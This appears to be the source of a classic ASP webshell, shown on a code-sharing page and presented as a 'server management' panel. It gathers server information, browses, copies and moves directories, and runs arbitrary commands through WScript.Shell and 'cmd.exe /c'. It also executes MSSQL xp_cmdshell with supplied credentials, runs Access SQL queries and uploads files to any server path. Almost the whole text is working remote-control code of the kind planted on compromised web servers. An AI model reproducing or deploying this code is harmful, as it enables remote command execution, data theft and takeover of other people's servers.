📄 200525154713.asp
字号:
<td height="32" align="center">
<input name="submit" type="submit" value="进入FSO页">
<input name="logout" type="submit" id="logout" value="退出登录">
<input type="hidden" name="password" size="20" value=<%=session("admin")%>></td>
<td height="32" align="center"><strong><font color="#FFCC00">“今叶在线”服务器管理。
</font></strong></td>
</tr>
</form>
<tr bgcolor="#FFFFFF" height=18>
<td width="42%" align=left> 服务器名</td>
<td width="58%"> <%=Request.ServerVariables("SERVER_NAME")%></td>
</tr>
<tr bgcolor="#FFFFFF" height=18>
<td align=left> 服务器IP</td>
<td> <%=Request.ServerVariables("LOCAL_ADDR")%></td>
</tr>
<tr bgcolor="#FFFFFF" height=18>
<td align=left> 服务器端口</td>
<td> <%=Request.ServerVariables("SERVER_PORT")%></td>
</tr>
<tr bgcolor="#FFFFFF" height=18>
<td align=left> 服务器时间</td>
<td> <%=now%></td>
</tr>
<tr bgcolor="#FFFFFF" height=18>
<td height="19" align=left> 本文件绝对路径</td>
<td> <%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%></td>
</tr>
<tr bgcolor="#FFFFFF" height=18>
<td align=left> 服务器CPU数量</td>
<td> <%=Request.ServerVariables("NUMBER_OF_PROCESSORS")%> 个</td>
</tr>
<tr bgcolor="#FFFFFF" height=18>
<td align=left> 服务器操作系统</td>
<td> <%=Request.ServerVariables("OS")%></td>
</tr>
<tr bgcolor="#FFFFFF" height=18>
<td align=left> 客户端IP: 端口 [代理]</td>
<td> <%=Request.ServerVariables("REMOTE_ADDR")%>| <%=Request.ServerVariables("REMOTE_PORT")%>
[<%=Request.ServerVariables("HTTP_X_FORWARDED_FOR")%>]</td>
</tr>
<tr bgcolor="#FFFFFF" height=18>
<%
dim t1,t2,lsabc,thetime
t1=timer
for i=1 to 500000
lsabc= 1 + 1
next
t2=timer
thetime=cstr(int(( (t2-t1)*10000 )+0.5)/10)
%>
<td align=left> 服务器运算速度测试</td>
<td> <font color=red><%=thetime%> 毫秒</font></td>
</tr>
</table>
<br><center>
<table width=500 border=0 align="center" cellpadding=0 cellspacing=0 class="box" >
<form action="<%= Request.ServerVariables("URL") %>" method="POST">
<tr height=18>
<td height="26" align=center bgcolor="#003366"><font color="#FFCC00"><strong>文
件 管 理</strong></font></td>
</tr>
<tr height=18>
<td height="25" align=left> <input type=text name=text value="<%=DSnXA %>">
输入要浏览的目录,最后要加\</td>
</tr>
<tr height=18>
<td align="center">
<%
Response.Write request.form("cmd") & "<br><br>"
Response.Write strResult
DSnXA = Request.Form("text") '目录浏览
if (DSnXA <> "") then
set shell=server.createobject("shell.application") '建立shell对象
set fod1=shell.namespace(DSnXA)
set foditems=fod1.items
for each co in foditems
response.write "<font color=black>" & co.path & "-----" & co.size & "</font><br>"
next
end if
DSnXA1 = Request.Form("text1") '目录拷贝,不能进行文件拷贝
DSnXA2 = Request.Form("text2")
if DSnXA1<>"" and DSnXA2<>"" then
set shell1=server.createobject("shell.application") '建立shell对象
set fod1=shell1.namespace(DSnXA2)
for i=len(DSnXA1) to 1 step -1
if mid(DSnXA1,i,1)="\" then
path=left(DSnXA1,i-1)
exit for
end if
next
if len(path)=2 then path=path & "\"
path2=right(DSnXA1,len(DSnXA1)-i)
set fod2=shell1.namespace(path)
set foditem=fod2.parsename(path2)
fod1.copyhere foditem
response.write "command completed success!"
end if
DSnXA3 = Request.Form("text3") '目录移动
DSnXA4 = Request.Form("text4")
if DSnXA3<>"" and DSnXA4<>"" then
set shell2=server.createobject("shell.application") '建立shell对象
set fod1=shell2.namespace(DSnXA4)
for i=len(DSnXA3) to 1 step -1
if mid(DSnXA3,i,1)="\" then
path=left(DSnXA3,i-1)
exit for
end if
next
if len(path)=2 then path=path & "\"
path2=right(DSnXA3,len(DSnXA3)-i)
set fod2=shell2.namespace(path)
set foditem=fod2.parsename(path2)
fod1.movehere foditem
response.write "command completed success!"
end if
DSnXA5 = Request.Form("text5") '执行程序要指定路径
DSnXA6 = Request.Form("text6")
if DSnXA5<>"" and DSnXA6<>"" then
set shell3=server.createobject("shell.application") '建立shell对象
shell3.namespace(DSnXA5).items.item(DSnXA6).invokeverb
response.write "command completed success!"
end if
%>
</td>
</tr>
<tr height=18>
<td height="22" align=left> <input type=text name=text1 value="<%=DSnXA1 %>">
copy
<input type=text name=text2 value="<%=DSnXA2 %>">
目的地址不要带文件名</td>
</tr>
<tr height=18>
<td height="21" align=left> <input type=text name=text3 value="<%=DSnXA3 %>">
move
<input type=text name=text4 value="<%=DSnXA4 %>">
目的地址不要带文件名</td>
</tr>
<tr height=18>
<td height="21" align=left> 路径:
<input type=text name=text5 value="<%=DSnXA5 %>" >
程序: <input type=text name=text6 value="<%=DSnXA6 %>" >
不可以加参数</td>
</tr>
<tr height=18>
<td height="30" align=center> <input type="text" name="ok" size=55>
[不回显]
<input type=submit name=sb value=发送命令> </td>
</tr>
</form>
<%
On Error Resume Next
hz=Request.Form("ok")
if hz<>"" then
hz="cmd.exe /c "&hz&""
set zh=server.CreateObject("WScript.Shell")
zh.run ""&hz&"",1,True
response.write "执行命令完成!"
'response.end
end if%>
</table>
<br>
<%
Dim strSQL, objDBConn, objRS, intFieldCount, intCounter,mdb
mdb = Request.QueryString("mdb")
strSQL = Request.QueryString("SQL")
If strSQL <> "" and left(trim(strsql),6)="select" Then
Response.Write "SQL字符串: " & strSQL & "<br>"
' 建立数据库连接的对象
Set objDBConn = Server.CreateObject("ADODB.Connection")
' 打开数据库连接 mdb请改为你要连接的数据库名字
objDBConn.Open "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" & Server.MapPath(mdb)
' 执行SQL的数据库查询
Set objRS = objDBconn.Execute(strSQL)
' 取得域的个数
intFieldCount = objRS.Fields.Count - 1
' 检查是否有记录
If Not objRS.Eof Then
Response.Write "<table border=1><tr>"
' 显示数据库的域名
For intCounter = 0 to intFieldCount
Response.Write "<td><b>" & objRS(intCounter).Name & "</b></td>"
Next
Response.Write "</tr>"
' 显示数据库内容
Do While Not objRS.Eof
Response.Write "<tr>"
' 显示每个记录的域
For intCounter = 0 to intFieldCount
If objRS.Fields(intCounter).Value <> "" Then
Response.Write "<td valign=""top"">" & objRS.Fields(intCounter).Value & "</td>"
Else
Response.Write "<td valign=""top"">---</td>"
End If
Next
Response.Write "</tr>"
objRS.MoveNext ' 移到下一条记录
Loop
Response.Write "</table>"
Else
Response.Write "<b>没有符合条件的记录</b><br>"
End If
objRS.Close ' 关闭记录集合
Set objRS = Nothing
objDBConn.Close ' 关闭数据库连接
Set objDBConn = Nothing
end if
if strSQL <> "" and left(trim(strsql),6)<>"select" Then
response.write"<script>javascript:alert('这不是select命令')</script>"
end if
%>
<table width=500 border=0 align="center" cellpadding=0 cellspacing=0 class="box">
<form action="<%=url%>" method="GET">
<tr height=18>
<td height="25" align="center" bgcolor="#003366"><font color="#FFCC00"><strong>ACEESS数据库SQL语句执行</strong></font></td>
</tr>
<tr height=18>
<td height="35" align="center">SQL字符串: <Input TYPE="TEXT" NAME="SQL" value="<%=strSQL%>" size ="30">
<Input TYPE="TEXT" NAME="mdb" value="数据库相对目录及名称" size ="25">
<input name="SUBMIT" type="SUBMIT" value="执行"></td>
</tr>
</form>
<form name="form" method=post action="<%=Request.ServerVariables("URL")%>">
<tr>
<td height="25" align=center bgcolor="#003366"><strong><font color="#FFCC00">SQLSERVER
xp_cmdshell执行</font></strong></td>
</tr>
<tr>
<td height="37" align=center> <input name="cmd" type="text" value="常用DOS命令" size=43 >
<input type="text" name="id" size=10 value="mssql用户名"> <input type="text" name="pa" size=10 value="mssql密码">
<input type="submit" value="执行"> </td>
</tr>
</form>
</table>
<br>
<%
If trim(request.form("cmd"))<>"" Then
password= trim(Request.form("pa"))
id=trim(Request.form("id"))
set adoConn=Server.CreateObject("ADODB.Connection")
adoConn.Open "Provider=SQLOLEDB.1;Password="&password&";User ID="&id
strQuery = "exec master.dbo.xp_cmdshell '" & request.form("cmd") & "'"
set recResult = adoConn.Execute(strQuery)
If NOT recResult.EOF Then
Do While NOT recResult.EOF
strResult = strResult & chr(13) & recResult(0)
recResult.MoveNext
Loop
End if
set recResult = Nothing
strResult = Replace(strResult," "," ")
strResult = Replace(strResult,"<","<")
strResult = Replace(strResult,">",">")
strResult = Replace(strResult,chr(13),"<br>")
End if
set adoConn = Nothing
%>
<table width=500 border=0 align="center" cellpadding=0 cellspacing=0 bgcolor="#003366" class="box">
<form name="form1" method="post" action="<%=url%>?up=1" enctype="multipart/form-data" ><tr height=18>
<td height="29" align="center"> <font color="#FFFFFF">传至服务器已有目录:</font>
<input name="filepath" type="text" value="d:\web" size="15">
<font color="#FFFFFF"> 文件地址:</font>
<input type="file" name="file1" value="" size=2>
<input type="submit" name="Submit" value="上传" >
<font color="#FFFFFF">〖绝对路径〗 </font></td>
</tr>
</form></table>
</body>
<%
end sub
sub main()
'修改下面的urlpath改为你服务器的实际URL
urlpath="http://"&Request.ServerVariables("server_name")
dim cpath,lpath
set fsoBrowse=CreateObject("Scripting.FileSystemObject")
if Request("path")="" then
lpath="/"
else
lpath=Request("path")&"/"
end if
if Request("attrib")="true" then
cpath=lpath
attrib="true"
else
cpath=Server.MapPath(lpath)
attrib=""
end if
%>
<script language="JavaScript">
function crfile(ls)
{if (ls==""){alert("请输入文件名!");}
else {window.open("<%=url%>?id=edit&attrib=<%=request("attrib")%>&creat=yes&path=<%=lpath%>"+ls);}
return false;
}
function crdir(ls)
{if (ls==""){alert("请输入文件名!");}
else {window.open("<%=url%>?id=dir&attrib=<%=request("attrib")%>&op=creat&path=<%=lpath%>"+ls);}
return false;
}
</script>
<script language="vbscript">
sub rmdir(ls)
if confirm("你真的要删除这个目录吗!"&Chr(13)&Chr(10)&"目录为:"&ls) then
window.open("<%=url%>?id=dir&path="&ls&"&op=del&attrib=<%=request("attrib")%>")
end if
end sub
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -